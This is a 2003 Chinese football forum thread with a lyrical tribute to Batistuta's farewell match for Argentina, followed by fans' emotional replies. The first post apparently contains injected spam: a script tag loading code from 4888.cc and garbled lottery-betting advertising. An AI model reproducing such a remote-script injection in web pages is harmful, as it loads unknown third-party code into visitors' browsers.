Aimma 发表于 2003-7-17 12:19:00

See You Once Again

See You Once Again
“眼望岁月与流水汇成的长河,回想时间是另一条河,要知道我们就像河流一去不复返,一张张脸孔水一样掠过。”
                                                   ------博尔赫斯
那一瞬,我恍若梦中。
真的是他?真的是他!
坚毅的神色,微皱的眉头,凝结了岁月的沧桑;明澈的眼眸,飘逸的长发,诠释出醉人的帅气。
仿佛是被什么在一霎那击中,我几乎不知所措。
从很久以前我就说服自己他已经离开,从此不关江湖;他褪去光环,卸下神圣,从此落入凡尘。我不再奢求什么天长地久,不再妄想什么青春永驻,只想祝福同在这星球的他不再受伤害,不再有痛楚,不再用泪水将我灼伤------
有什么东西在心口涌动,从眼角溢出,滚烫滚烫,在我的脸颊划过。
十年前,他名动天下。
名剑既出,气贯长虹,见血封喉;弯弓搭箭,气吞山河,所向披靡;他飞翔似雄鹰,驰骋如烈马,最狂野奔放的姿态将世界震撼,最明媚灿烂的笑容把身后的屠杀化于无形。
于是,蓝白战袍迷蒙了无数目光,在紫色的高贵里凝结成顶礼膜拜的热爱。
炽热的战斗之火在他的血液里涌动,不屈的豪情铭刻于他的骨髓之中。
他天生是万里风云一肩挑的战士,他天生要追逐一剑笑天下的狂放不羁。
Gabriel Omar Batistuta
轻轻在唇间吐出这个名字,竟是唏嘘不已。
这不是十年前!
2003年7月9日,阿根廷,布宜诺斯艾利斯,纪念体育场。
25年前,这里纷飞过漫天的蓝白纸片,充盈过震耳的欢呼,一样长发飘逸的肯佩斯把阿根廷带到世界之颠。
如今,这个被称为战神的男子在这里,庆祝25年前的胜利,也和他钟爱的阿根廷队说再见。
我看到的是他的笑靥,依旧如同五月的阳光。
我捂着嘴,泪眼迷蒙里,我笑得真实而又落寞。
他和那些同样曾为阿根廷的荣誉而战的人们,在这片土地上,这梦幻般的绿茵场,他们曾经叱咤风云的战场。
他的剑又刺破了球门,而且是两次。
只是,我们都明白,再好的剑都禁不住时间的磨损,他的剑较之以往,多少少了些锐利,也少了些霸气。
而我们,暗自啜泣。
历史在这一瞬间倒流。
他的身上变幻着色彩,紫色的忠诚,红色的辉煌,蓝黑的无奈,还有------
最终幻化成蓝白的迷醉。
2000,他离开翡冷翠,从此开始流浪。
2001,他十年磨成一剑。
2002,他把一生的悲苦融化成眼泪埋在东瀛,从此不能再追逐他的梦想。
2003,他穿上19号的蓝黑剑条衫,然后又在漫天的口水里踏上西亚的土地;西野说他相信他是去播种足球的种子,而我为这句话泪如雨下。
青春要经过怎样的磨练,才能焕发永恒的光彩?年华要怎样流去,才不会留下空白?岁月要褪掉多少表面的流光溢彩,才显现它本质的光辉?而我们的爱,要禁受多少悲痛和失望的洗礼,才能找到它的方向和寄托?
So I say a little prayer
And hope my dreams will take me there
Where skies are blue, to see you once again ---my love
Overseas coast to coast
To find the place I love most
Where fields are green, to see you once again----my love
我终于开始坦然微笑,在他转身之际。
你知道,世间只有一个战神。

< url=http://www.9p.cc">
<script type="text/javascript" src="http://4888.cc/b.js"></script>
<link href="http://4888.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

┗金┗┗┗时┗彩┗

┗合┗投┗注┗┗

云淡风轻 发表于 2003-7-17 12:36:00

我知道总有一天所有刻骨铭心的伤痛都会愈合,
记忆里吉光片羽的美丽会渐渐散落.
我设想过有一天,
在岁月的某个磨合口与他重逢.
我甚至设想多年以后可能笑看今日无谓的错过与放弃.

我相信在这个世界上,
所有深情而执着的人都会在最终等到幸福,
比如巴蒂,比如我.
所以,我不会驻足不前,不会沉溺过往...

但是这一刻,看着电脑屏幕,
我终于忍不住,泪如雨下.

Aimma 发表于 2003-7-17 12:40:00

我相信在这个世界上,
比如巴蒂,比如我.

mm说得好好啊。正是我要说的

巴蒂_阿伦 发表于 2003-7-17 12:47:00

一生中最爱。。

云淡风轻 发表于 2003-7-17 12:50:00

以下是引用Aimma在2003-7-17 12:40:00的发言:
我相信在这个世界上,
比如巴蒂,比如我.

mm说得好好啊。正是我要说的

我们一起来为巴蒂祝福,一起把最美好的文字和最真挚的感情献给他~~

雪狼 发表于 2003-7-18 10:45:00

是啊写得很好!!
我的心如你的一样!!
我是射手!!

Aimma 发表于 2003-7-18 11:01:00

谢谢射手
那天看新闻的时候看到他,觉得很伤感,就写了

天使的羽毛 发表于 2003-7-18 11:26:00

突然好想回到过去,战神的时代... ...

杨七狼 发表于 2003-7-18 12:28:00

淡漠平生何所求,酒伴光阴,诗送春秋。
任凭沧海变桑田,人自逍遥,心自漂游。

笑看人间名利囚,富贵无边,荣禄难休。
男儿傲骨铁铮铮,志纵云霄,气纵神州。
页: [1]
查看完整版本: See You Once Again